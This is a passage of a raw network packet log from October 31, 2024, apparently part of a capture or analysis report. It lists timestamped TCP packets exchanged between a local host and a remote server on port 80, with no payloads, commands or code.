                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906290054 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906300068 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906310081 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906320095 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906327963 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906332016 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906341076 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906343937 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906358957 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906936884 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906949043 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906956911 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906968117 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906977892 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906980038 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.906995058 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907001019 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907007933 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907018900 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907030106 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907041073 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907047987 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907052994 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907063961 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907064915 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907074928 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907087088 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907097101 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907104969 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907109022 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907113075 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907120943 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907131910 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907140970 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907147884 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907165051 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907699108 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907711029 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907721043 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907736063 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907746077 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907751083 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907752991 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907756090 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907768011 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907792091 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907983065 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.907994986 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908004999 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908015966 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908021927 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908026934 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908039093 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908041000 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908051014 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908061028 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908061028 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908073902 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908083916 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908085108 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.908113003 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.944828987 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.944842100 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.944854021 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.944890022 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.944988012 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.944999933 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.945008993 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.945034981 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.945045948 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.954905987 CET44349173142.250.184.206192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019355059 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019510984 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019520998 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019531012 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019541979 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019553900 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019558907 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019572020 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019582987 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019587994 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019593954 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019606113 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019622087 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019634008 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019635916 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019665956 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019794941 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019805908 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019815922 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019826889 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019836903 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019846916 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019846916 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019867897 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019937038 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019948006 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019958973 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019969940 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019970894 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.019984961 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020009041 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020032883 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020042896 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020081997 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020173073 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020184994 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020195007 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020205021 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020212889 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020221949 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020231009 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020246983 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020260096 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020360947 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020371914 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020381927 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020391941 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020401955 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020406008 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020415068 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020422935 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020431042 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020448923 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020590067 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020601034 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020612001 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020621061 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020632982 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020638943 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020649910 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020725965 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020735025 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020745039 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020772934 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020843029 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020854950 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020864010 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020878077 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020886898 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020889044 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020899057 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020910025 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020910978 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020931005 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020941019 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.020972967 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021145105 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021157026 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021167040 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021189928 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021295071 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021307945 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021317005 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021332979 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021354914 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021356106 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021368027 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021378040 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021379948 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021389961 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021401882 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021404028 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021414042 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021425009 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021431923 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021449089 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021459103 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021464109 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021495104 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021730900 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021743059 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021752119 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021773100 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021969080 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021985054 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.021995068 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022005081 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022010088 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022020102 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022022963 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022034883 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022046089 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022056103 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022063017 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022067070 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022078037 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022082090 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022089958 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022104979 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022104979 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022116899 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022126913 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022136927 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022149086 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022157907 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022159100 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022166967 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022170067 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022181988 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022192955 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022198915 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022224903 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022530079 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022540092 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022548914 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022566080 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022576094 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022581100 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022588015 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022599936 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022622108 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022671938 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022682905 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022691011 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022706985 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022717953 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022727013 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022730112 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022742987 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022753000 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022762060 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022763968 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022774935 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022785902 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022789955 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022802114 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022810936 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022824049 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022834063 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022835970 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022847891 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022849083 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022859097 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022869110 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022871971 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022880077 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.022898912 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023379087 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023390055 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023400068 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023410082 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023421049 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023427963 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023432970 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023446083 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023449898 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023464918 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023657084 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023668051 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023683071 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023695946 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023700953 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023709059 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023720026 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023729086 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023732901 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023741961 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023751974 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023752928 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023762941 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023796082 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023819923 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023833036 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023842096 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023852110 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023861885 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023869991 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023871899 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023884058 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023885012 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023895025 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023905993 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023907900 CET4917480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023917913 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023929119 CET8049174107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.023938894 CET8049174107.174.146.46192.168.2.22
